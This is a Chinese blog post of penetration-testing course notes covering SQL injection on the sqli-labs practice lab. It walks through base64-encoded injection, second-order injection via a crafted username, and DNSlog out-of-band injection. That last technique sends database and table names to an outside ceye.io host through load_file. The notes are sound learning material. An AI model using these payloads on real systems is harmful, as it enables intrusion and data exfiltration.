小迪渗透测试学习笔记(十七)WEB漏洞-二次,加解密,DNS等注入

最新推荐文章于 2024-04-24 16:43:17 发布
最新推荐文章于 2024-04-24 16:43:17 发布
阅读量816 收藏
点赞数 1
分类专栏: 安全 渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42591058/article/details/122310551
版权

1. 加解密注入

get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ==
加密部分:MQ==
解密结果:1

案例:sqlilabs-less21

  1. burp抓包
    在这里插入图片描述
    在这里插入图片描述
  2. forward,可以看到uname=YWRtaW4%3D
    在这里插入图片描述
  3. %3D 为 = ,base解密为admin
    在这里插入图片描述
  4. 将uname的值改为注入语句:
admin' or updatexml(1,concat(0x7e,(database())),0) or '

并进行base64加密,得:

YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSksMCkgb3IgJw==

在这里插入图片描述

  1. 注入成功
    在这里插入图片描述

2. 二次注入

在这里插入图片描述
二次注入是存储型注入,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。

案例:sqlilabs-less24

  1. 注册新用户
    在这里插入图片描述

在这里插入图片描述
2. 登录新注册的用户修改密码为aaa
在这里插入图片描述

  1. 查询数据库,可以发现admin1’#的密码没有改,而admin1的密码更改了
    在这里插入图片描述
    原因是代码执行的过程中将’#没有过滤直接带入执行导致’与前面的代码闭合而#将后面的代码注释了。

3. DNSlog注入

案例:sqlilabs-less9

  1. http://ceye.io/注册一个账号在这里插入图片描述
  2. 构建payload,获取库名
http://127.0.0.1/sqli-labs/Less-9/?id=1' and load_file(concat("\\\\",database(),".xxxx.ceye.io\\xxxx.txt"))--+

注: .xxxx.ceye.io 是自己子域名,前面要加个 .
后面的\xxx.txt,\是必须的,xxx.txt这部分随便,不能为空。
在这里插入图片描述
3. 构建payload,获取表名

http://127.0.0.1/sqli-labs/Less-9/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".xxxx.ceye.io\\xxxx.txt"))--+

在这里插入图片描述

萧丶RY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小迪基础渗透笔记0-24天
05-18
小迪基础渗透笔记0-24天
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1032
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入在SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5318
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
渗透测试培训学习笔记汇总1(小迪安全
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-04 1124
域名系统(服务)协议(DNS)是一种分布式网络目录服务,主要用于域名与 IP 地址的相互转换,以及控制因特网的电子邮件的发送。后门是指恶意程序或代码,通过绕过正常的访问控制机制,使攻击者能够在目标系统中保持持久的访问和控制权限。后门通常被用于非法入侵、数据盗取、远程控制等恶意活动。常见的后门类型包括:逻辑后门:通过在代码中插入特定的条件或逻辑,使攻击者可以在特定条件下获得未授权的访问权限。(黑客遗留的后门文件,网站后门webshell)远程后门。
SqliLabs Less21-22
qq_45785324的博客
07-15 395
SqliLabs Less21 Less22
sqli-labs-master通关之LESS20-LESS25
weixin_43726831的博客
10-09 814
SQL注入之sqli-labs-master LESS-20 第20关 POST交互方式下的cookie字段注入 第20关正确的回显页面如下图所示 从图中可以看出这一关是与cookie有关,正确的页面进入后,只有一个按钮Delete your cookie! cookie是客户端记录的会话信息,session记录服务器端的会话信息,此时客户端已经记录了与服务器端交互的会话内容,由此可推断出,注入...
SQL注入(2)——各种注入
realmels的博客
04-24 916
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。 这里配合先前搭建好的sqli-lab进行测试 报错注入 报错注入主要是通过使数据库报错,从而获取信息。 这里报错函数主要是updatexml、ex.
WEB漏洞-SQL注入二次加解密DNS注入学习笔记
qq_19375535的博客
07-02 465
sql注入学习笔记
小迪安全》第17天 SQL注入二次注入,加解密注入,DNSlog注入
m0_56250796的博客
04-30 212
通过 concat() 函数将查询结果和api的地址进行拼接,形成一个四级域名,然后通过load_file()函数将域名进行dns解析,然后就可以在dns平台进行查看了。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。在无法通过联合查询直接获取数据时,只能通过盲注一步步的获取数据,手工测试需要花费大量的时间,使用sqlmap等工具有很大的几率被封IP。实际情况中需要测试注入点,本题白盒测试默认已知为Cookie注入注入点为 uname。
21-40关
bsaikfhgihwi的博客
02-08 322
第二十一关 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时候base64加密一下就可以了。 先抓包看一下: hadow_10,text_aHR0cHM6Ly9...
Linux下用base64命令加解密字符串
大虾别跑
10-26 1276
Linux下用base64命令加解密字符串 #加密 echo -n "admin" | base64 YWRtaW4= #解密 echo YWRtaW4= | base64 -d admin
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 686
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场;
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
2021小迪web安全笔记全套.zip
08-16
安全圈子知名讲师 小迪 2021最新教学的课堂笔记 教程还是挺不错的,很好入门。教程也比较新,有新的waf绕过方法以及代码审计,还有新的工具和渗透思维。
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
渗透测试学习笔记资源
08-19
渗透测试学习笔记资源
全视通智慧手术室对讲方案,让手术更安全更高效
最新发布
2301_78035670的博客
04-24 450
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 820
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 329
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
openCV学习笔记----深入理解高斯滤波(二)
06-11
好的,你的第一个问题是关于 OpenCV 中的高斯滤波的学习笔记,对吧?没问题,我可以为您提供一些关于高斯滤波的深入理解。 高斯滤波是一种常用的图像滤波器,它可以平滑图像并降低噪声。它的基本思想是对图像中的每个像素周围的像素进行加权平均,以便消除噪声和细节。 高斯滤波器的核是一个二维高斯函数,它可以根据需要调整大小和方差。方差越大,滤波器的效果越弱,图像的细节越明显。相反,方差越小,滤波器的效果越强,图像的细节越模糊。 高斯滤波器可以使用 OpenCV 中的 `cv2.GaussianBlur()` 函数来实现。该函数需要三个参数:输入图像、核大小和标准差。核大小必须是正的奇数,标准差可以根据需要进行调整。 在使用高斯滤波器时,需要注意平衡平滑和保留图像细节之间的权衡。因此,使用合适的核大小和标准差非常重要,以便在滤波图像时达到最佳效果。 希望这些信息能够对您有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值